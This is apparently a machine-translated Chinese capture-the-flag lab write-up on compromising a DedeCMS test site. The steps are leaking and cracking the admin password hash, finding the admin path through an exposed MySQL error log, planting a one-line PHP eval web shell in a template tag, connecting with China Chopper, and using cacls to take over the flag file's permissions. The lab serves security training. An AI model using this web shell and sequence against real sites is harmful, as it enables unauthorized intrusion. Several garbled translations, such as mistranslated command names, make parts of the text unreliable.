陈述
仅用于教育目的,不得用于非法活动。请不要利用文章中的相关技术进行非法测试。由此产生的任何负面后果与文章作者及本公众号无关。
标题地址
https://www.ichunqiu.com/experiment/detail?id=51123source=1otype=1
问题要求
请求获取目标网站的FLAG信息
打开环境后的页面
按照提示,我进入http://file.ichunqiu.com/49ba59ab并下载了dedeCMS。我下载的是一个可以一键泄露账户密码的软件。
请输入爆破目标地址http://www.test.ichunqiu
获取账号和密码的MD5值
解密加密的MD5 值
在线MD5解密:https://www.somd5.com/
获取密码:only_system
我有账号和密码。但后台地址未知,所以扫描后台目录。
您的环境中的工具包括许多用于目录扫描的工具。
这里使用御剑后台扫描工具
检查完每个地址后,发现所需的后台地址都没有,于是我尝试换字典和扫描仪进行扫描,但还是发现没有后台地址。
如何在百度上找到Dreamweaver CMS后端
日志暴露后端地址
https://blog.csdn.net/forest_fire/article/details/50944689
可以看到,可以从错误文件/data/mysql_error_trace.inc或/data/mysqli_error_trace.inc中检索到泄露的后台路径。
http://www.test.ichunqiu/data/mysql_error_trace.inc 目录找到
当你访问它时,你会看到它是一个后端地址。
使用我的账号和密码登录后,就可以成功访问后台了。
接下来,您需要上传Web shell并获取主机权限。
百度搜索获取WebShell方法
https://www.cnblogs.com/milantgh/p/3634550.html
在后台界面中,您会注意到您可以在模板标签的源代码管理区域中添加新标签或编辑现有注释。
在这里,编辑现有标签,写入文本,然后保存。
?php @eval($_POST[‘lemonlove7’]);
顶部还有一个提示,告诉您文件的保存位置。
访问那里并使用环境附带的切肉刀进行连接
成功获得贝壳
我查看了位于C盘“文档和设置”–“管理员”–桌面上的flag~ichunqiu.txt文件。
我查了一下,是空的,但是文件大小不为0。
使用cmd 命令中的type 验证访问是否被拒绝。原来是你的权限不够。
使用whoami 显示当前用户权限
谁阿米
我发现所有系统都有最高权限,但是我发现百度可能设置了文件权限。
如何在Windows中设置文件和文件夹权限:https://www.jb51.net/article/51907.htm
如果使用cacls命令检查falg~ichunqiu.flag文件的权限,你会看到系统用户有n个权限。这意味着你没有权限。
cacls标志~ichunqiu.txt 
使用cacls 命令将flg~ichunqiu.flag 文件的权限更改为F。
cacls标志~ichunqiu.txt /E /P system:F /C 
我成功拿到flag了
输入标志~ichunqiu.txt 
结尾
与专家一起成长,学习网络安全知识。
文章来源:鹏集团安全
如有侵犯版权,请联系我们删除。
原创文章,作者:小条,如若转载,请注明出处:https://www.sudun.com/ask/83909.html
